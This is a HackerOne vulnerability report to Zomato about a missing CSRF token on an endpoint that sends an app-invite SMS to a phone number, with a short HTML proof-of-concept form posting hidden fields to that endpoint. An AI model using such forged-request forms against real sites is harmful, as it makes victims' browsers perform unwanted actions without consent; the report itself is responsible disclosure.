Zomato: CSRF AT INVITING PEOPLE THOUGH PHONE NUMBER

2016-02-01T14:07:30
ID H1:113865
Type hackerone
Reporter kiraak-boy
Modified 2016-09-14T15:10:19

Description

Hello,

Please Add CSRF Token While Inviting The User Though Phone Number , You Have Good Rate Limit Protection But At The Same Time Add CSRF TOKEN :-

CODE :-

<html> <body> <form action="https://www.zomato.com/php/restaurantSmsHandler"> <input type="hidden" name="type" value="zomato-app-details" /> <input type="hidden" name="mobile_no" value="xxxxxxxxxxxxxx" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Thanks!